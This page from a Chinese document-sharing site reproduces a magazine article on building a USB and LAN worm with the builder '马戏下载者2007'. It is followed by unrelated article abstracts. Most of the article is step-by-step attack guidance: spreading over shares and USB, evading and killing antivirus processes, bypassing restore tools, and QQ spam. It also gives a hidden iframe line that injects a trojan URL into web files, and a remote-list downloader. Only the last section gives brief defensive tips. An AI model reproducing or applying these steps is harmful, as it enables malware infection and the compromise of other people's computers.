U盘蠕虫病毒是怎样炼成的?

来源 :网友世界 | 被引量 : 0次 | 上传用户:bsbs
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  超强U盘蠕虫病毒制造机
  
  “马戏下载者2007”是一个非常强悍的U盘蠕虫病毒制造工具,除了具备U盘、移动硬盘等移动存储感染传播功能外,还具有蠕虫的特性。马戏下载者2007可像蠕虫病毒一样,在局域网中自动感染传播,只要有一台电脑中了此病毒,那么整个局域网将无一幸免。更有意思的是,马戏下载者2007不仅会自动感染EXE文件,还可以网页木马的方式,感染隐藏在HTM、ASP、HTML、PHP等网页文件中!这就让马戏下载者2007反复再生死灰复燃。更难以彻底清除。
  
  病毒基体——U盘感染
  
  首先,我们要生成一个基本的U盘感染型病毒。运行马戏下载者2007,勾选界面“VIP功能”中的“U盘传播”项,点击“生成”按钮,指定文件保存路径,即可生成一个最基本的U盘感染性病毒木马了。为了防止木马被杀毒软件查杀,可以勾选“超强保护”项,使生成的病毒木马自动加上一个特殊壳,以躲过一些杀软的检测。而且采用超强保护功能后,病毒木马进程会采用双进程自动保护,并在系统中添加多个启动项目,以确保不被完全查杀清除掉。
  
  超强蠕虫,共享还原不放过
  
  有了超强保护功能还不够,现在我们要为病毒加上蠕虫功能。在马戏下载者2007设置界面中。勾选“共享传播”项,即可实现蠕虫功能。在普通的局域网中,往往默认开放了IPC$,提供了文件夹共享功能。使用病毒的“共享传播”功能后,病毒将会自动搜索整个局域网中所有电脑的共享资源。将自身复制到共享文件夹中,并采用自动播放功能感染该电脑,一台也不放过!
  有许多公司或网吧中的电脑,都使用了还原精灵之类的工具,一旦进行系统恢复,蠕虫病毒就被清除了。不过马戏下载者2007提供了还原转存功能,让病毒木马可以穿透还原精灵,勾选界面中的“还原转存”项,即可启用该功能让还原精灵失效。
  
  锁定IE,尾巴跟定你
  
  想要宣传某个广告网页,或者网页挂马,那么可以锁定IE浏览器的首页。勾选马戏下载者2007设置界面中的“锁定IE”项,在后面输入要锁定的IE网页链接即可。
  木马病毒传播的途径,当然不只有U盘或局域网蠕虫几种,QQ尾巴传播也是木马病毒采用的有效手段之一。勾选“QQ尾巴内容设置”项。在后面输入要设置的QQ尾巴内容文字和网页木马链接,即可感染中毒电脑上的QQ,让其自动发送QQ尾巴宣传广告或病毒木马地址内容。
  
  另类感染,网页中能藏身
  
  一旦刚才制作的病毒被发现,那么肯定是杀无赦的。如何才能躲过杀毒软件的查杀呢?有许多电脑上都保存有从网上下载的一些网页资料,将病毒木马隐藏在网页中,即使系统中其它的病毒都统统被清除掉了,只要使用者打开电脑上的某个网页文件,就会重新再次感染病毒!
  首先,我们需要制作一个网页木马,具体方法这里不多讲,以前有过很多这方面的介绍了。假设网页木马地址为“http://www.muma.com/muma.html”,可将网页木马地址加入如下语句中:
  (iframe src=“http://www.muma.com/muma.html”name=“0”width=“0”height:“0”ffameborder=“0”)
  在实际使用中,修改其中的木马网页地址即可。然后在马戏下载者2007界面中勾选“感染ASP”、“感染HTM”、“感染PHP”、“感染HTML”、“感染ASPX”几项,在下方的“感染代码”中输入上面的代码语句。生成的木马病毒,在运行即会自动感染所有的网页文件。在网页文件中添加上面的代码语句。当然,也别忘记勾选“感染EXE”项,让木马病毒自动感染EXE可执行程序。
  
  一变多,下载者功能
  
  在马戏下载者2007中还提供了“下载者”功能。可控制被感染的电脑下载任意的木马。与普通下载者不同的是,马戏下载者2007配置下载者时,不必直接指定多个木马网址,而是可以指定一个包含所有木马网址的文本链接,通过更新文本就可更换下载新的木马,特别适合于更换或更新被感染主机上的木马服务端程序。
  首先,我们可以用记事本编写一个文本文件。假设文件名为“xiazai.txt”。将木马网址链接按一行一个的格式输入其中,保存文本并上传到某个网站空间中。得到其链接地址。假设这里链接地址为“http://www.muma.com/xiazai.txt”。在马戏下载者2007中的“无限下载者设置”处,输入前面的链接地址,点击“保存”按钮。生成的木马就会自动下载并运行文本中指定的木马文件了。以后要更换下载木马时,可以直接修改“xiazai.txt”文本中的链接地址就可以了。
  
  反杀病毒软件
  
  现在的木马病毒清除工具还是很厉害的,要想保住木马病毒,最直接的办法就是干掉杀毒软件和反病毒工具。马戏下载者2007中提供了进程结束功能,在“结束进程”中直接输入杀毒软件的进程名。例如要反杀卡巴斯基,那么可输入“avp.exe”;要禁止主机上运行360安全卫士,那么可输入“360Safe.exe”。多个进程名之间用英文半角“。”号隔开。
  
  别让马戏下载者2007进了你的门
  
  从上面的介绍,可以看出马戏下载者2007这类U盘蠕虫病毒是非常可怕的。它采用了局域网蠕虫感染、U盘感染、自动播放感染、QQ感染、网页文件和下载者感染等多种方式,只要一旦中了这类木马病毒,那么就很难清除掉,就算重装系统也会被重复感染。如何防范这类病毒呢?除了一般通用的病毒防范与查杀手段外。还需要注意以下几点:
  首先,要关闭系统中的自动播放功能、局域网共享功能。这样可防止U盘感染及局域网蠕虫感染。其次,在使用杀毒软件查杀系统时,一定要选择全面查杀,不光检测系统盘,其它数据盘也不能放过。而且在查杀系统时,应该选择查杀所有类型的文件,不要漏掉网页文件。另外,即使系统上安装了还原精灵之类的即时还原工具,也不能大意,还原系统后最好也再进行一次全面的病毒查杀,以防病毒穿透了还原工具。
  下载链接:http://blog.sina.com.cn/u/42ccdOe3010008cc
其他文献
“樱花下落的速度,每秒五厘米。”淡淡的一句话,却吸引我将这部情节略显平淡的动画反复看了几遍。这是我第一次看新海诚的作品,唯美到极点的画面;平淡而感人的情感,全都让人难以释怀,新海诚给我们描绘了一个美如童话的故事,却又给了它一个残酷如现实的结尾。  春天,樱花飞舞的季节,她撑着一把樱花色小伞欢快的奔跑。和他谈着各种新鲜的话题。  他,远野贵树;她,筱原明里,那时候他们都相信会一直在一起。此时两人间奔
期刊
目前,不少喜欢尝鲜的新手朋友纷纷慕名Vista所带来的新特性,急切地欲在其中展开一番体验。不过Vista与传统的XP操作系统都有着较大的差异。因而很多用户在体验还未开始日寸,就遇到了一个极大的困难——网络连接,对于操作方法不同,很多用户已经找不到“北”了,所以在Windows Vista系统中顺利连接互联网便成为了一道难题。  本文中以大家经常使用的ADSL拨号连接以及小区宽带为例,介绍它们的连接
期刊
上网边聊天边听歌.很多时候得同时打开聊天程序和音乐播放器。打开太多的程序窗口,占用资源不说。还不利于程序窗口管理。笔者很喜欢用POPO发短信。也一直在后台挂着它赚泡币。对此。我们可以直接使用POPO内嵌的音乐盒充当播放器。  在POPO主窗口里点击左栏的“音乐盒”标签,在切换的标签窗口里单击“打开”按钮.选择本地歌曲保存的文件夹,然后在列表里双击歌曲就开始播放了。在下方的播放信息栏里可以启用循环、
期刊
在以IE为内核的第三方浏览器领域里,Maxthon、GreenBrowser是大家最熟悉的。近两年,Maxthon也一直在开发2.0版本。当然还有很多浏览器也在紧锣密鼓开发着新版本,世界之窗(TheWorld)就是紧追其后的一个,前不久刚刚推出了2.0 Final版本。新版本的窗口布局、操作、功能里,都会找到Maxthon 2.0的踪影,不过笔者使用起来更加舒服,这期我们就一起领略这个浏览器新锐的
期刊
前次参加雪佛兰免费兑换QQ秀活动(活动页面:http://transformers.chevrolet.com.cn/qq_show.aspx),得到了一些变形金刚的QQ秀。把这个活动告诉给好友后,谁知好友却回来向笔者诉苦,说活动提示“今天注册人数已满,请明天继续”。虽然笔者还有多余的QQ秀,但是都是“获赠”的。想顺利将这QQ秀送出,还得用些小伎俩。    第一步:双击某位好友打开QQ聊天窗口。在
期刊
暑假在家,但仅有一台电视,难道还要与别人争夺电视控制权吗?其实网络上有很多不错的网络电视软件,而且还有很多影视播放功能。不过软件之间的差别也非常大,为此,我们特意选择了几款主流的网络电视播放工具,它们分别是PPLive1.7、PPStream 2.0、QQLive(QQ直播)5.0 、uuSee网络电视2007。然后从频道、资源、速度、稳定性等几大用户最关心的方面出发,帮你挑选一款优秀的网络直播软
期刊
不知道大家注意到没,Windows Vista集成的Windows Media Player 11比for Windows XP的版本多了一些功能。比如媒体库共享功能。通过这项功能。在局域网里共享多媒体资源就方便很多。默认情况下,局域网的电脑在Vista系统可以轻松享用该功能。对于Windows XP的系统。就要略施小技才能共享WMP11多媒体资源。    局域网使用Vista系统需要进行以下设置
期刊
现在很多浏览器(如Maxthon、世界之窗)都支持自动填表功能,即事先保存网页的表单数据,下次打开网页时,通过点击相应菜单或按热键方法自动填写表单。不过有些网页加强了安全防范,一些表单编辑框使用了ActiveX控件,这样大部分浏览器的自动填表功能就无能为力了。还好,我们可以通过下面的技巧,就可以轻松在GreenBrowser实现ActiveX控件填表自动化。    第一步:很多网上银行的帐号、密码
期刊
QQ用的时间长了,期间也换过很多次QQ秀,还好QQ秀里有个免费的照相功能。通过它,可以将自己打扮的QQ秀保存在QQ秀相册里。有事没事翻出来看看自己不同时期的“品味”。同样,QQ好友也会使用照相功能保存QQ秀,只要好友的QQ秀相册是公开的。也可以看到他们以前打扮的QQ秀。  第一步:使用自己的QQ号码登录QQ秀(http://qqshow.qq.com/),单击页面顶部的“照相馆”文字链接。  第二
期刊
为了丰富同学们的课余生活,学校特意下午课外活动期间,为大家提供了歌曲点播活动,大家可以通过任何一台连接到校园网的电脑,为自己或其他同学点播自己喜欢的歌曲,送上自己最真挚的祝福。那么,学校用的点歌利器是什么呢?它就是我们本文要介绍的“欢乐DJ”(下载地址:http://www.newskynet.com/happydjdown.htm)。    架设点歌服务器    “欢乐DJ”是一款绿色软件,下载
期刊